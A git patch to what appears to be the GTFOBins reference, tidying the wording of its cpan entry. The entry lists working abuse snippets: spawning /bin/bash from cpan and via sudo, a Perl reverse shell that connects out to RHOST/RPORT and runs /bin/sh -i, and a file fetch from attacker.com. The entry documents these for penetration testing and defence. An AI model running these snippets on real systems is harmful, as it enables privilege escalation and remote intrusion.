From 23dae5406ed8e64c4c5636d0d66d81d9b8092fb2 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 8 Nov 2018 21:15:22 +0100 Subject: [PATCH] Minor fixes on cpan --- _gtfobins/cpan.md | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/_gtfobins/cpan.md b/_gtfobins/cpan.md index b161174..9301a62 100644 --- a/_gtfobins/cpan.md +++ b/_gtfobins/cpan.md @@ -1,35 +1,30 @@ --- functions: shell: - - description: cpan lets you execute perl commands with `! command` + - description: `cpan` lets you execute perl commands with the `! command`. code: | cpan ! exec '/bin/bash' - reverse-shell: - - description: Run ``nc -lvp RPORT`` on the attacker box to receive the shell. + - description: Run `nc -lvp RPORT` on the attacker box to receive the shell. code: | export RHOST=localhost export RPORT=9000 cpan ! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");}; - file-upload: - - description: Serve files in the local folder running an HTTP server on port 8080. Install dependency via `cpan HTTP::Server::Simple`. + - description: Serve files in the local folder running an HTTP server on port 8080. Install the dependency via `cpan HTTP::Server::Simple`. code: | cpan ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run(); - file-download: - - description: Fetch a remote file via HTTP GET request and store it in PWD. + - description: Fetch a remote file via an HTTP GET request and store it in `PWD`. code: | export URL=http://attacker.com/file_to_get cpan ! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch(); - sudo: - code: | sudo cpan ! exec '/bin/bash' - ---